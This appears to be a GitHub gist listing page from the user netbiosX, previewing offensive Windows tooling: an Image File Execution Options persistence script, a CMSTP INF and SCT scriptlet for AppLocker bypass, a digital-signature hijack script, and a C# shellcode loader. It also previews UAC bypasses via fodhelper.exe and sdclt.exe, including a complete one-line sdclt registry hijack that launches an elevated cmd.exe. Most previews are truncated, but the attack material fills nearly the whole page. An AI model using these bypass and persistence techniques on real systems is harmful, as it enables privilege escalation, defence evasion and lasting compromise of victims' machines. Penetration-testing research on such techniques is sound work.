netbiosX
/ ImageFileExecutionOptions.ps1
Last active Jan 15, 2021
Image File Execution Options Injection - Persistence Technique
View ImageFileExecutionOptions.ps1
| <# | |
| ImageFileExecutionOptions v1.0 | |
| License: GPLv3 | |
| Author: @netbiosX | |
| #> | |
| # Image File Execution Options Injection Persistence Technique | |
| # https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ | |
| function Persist-Debugger |
netbiosX
/ pentestlab-dll.inf
Created May 7, 2018
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
View pentestlab-dll.inf
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| RegisterOCXs=RegisterOCXSection | |
| [RegisterOCXSection] | |
| C:\Users\test.PENTESTLAB\pentestlab.dll |
netbiosX
/ DigitalSignature-Hijack.ps1
Last active Jul 14, 2020
Hijack Digital Signatures and Bypass Authenticode Hash Validation
View DigitalSignature-Hijack.ps1
| <# | |
| DigitalSignatureHijack v1.0 | |
| License: GPLv3 | |
| Author: @netbiosX | |
| #> | |
| # Validate Digital Signature for PowerShell Scripts | |
| function ValidateSignaturePS | |
| { | |
| $ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
View customers.xml
| <?xml version="1.0"?> | |
| <?xml-stylesheet type="text/xsl" href="script.xsl" ?> | |
| <customers> | |
| <customer> | |
| <name>Microsoft</name> | |
| </customer> | |
| </customers> |
View Sdclt.ps1
| <# | |
| .SYNOPSIS | |
| This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10. | |
| Author: @netbiosX | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass |
View sdclt.bat
| reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f |
netbiosX
/ FodhelperUACBypass.ps1
Last active Jan 13, 2021
Bypass UAC via Fodhelper binary in Windows 10 systems
View FodhelperUACBypass.ps1
| <# | |
| .SYNOPSIS | |
| This script can bypass User Access Control (UAC) via fodhelper.exe | |
| It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts | |
| an elevated command prompt. | |
| .NOTES | |
| Function : FodhelperUACBypass | |
| File Name : FodhelperUACBypass.ps1 |
netbiosX
/ Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
View pentestlab.sct
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="Pentest" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - @netbiosX --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe"); |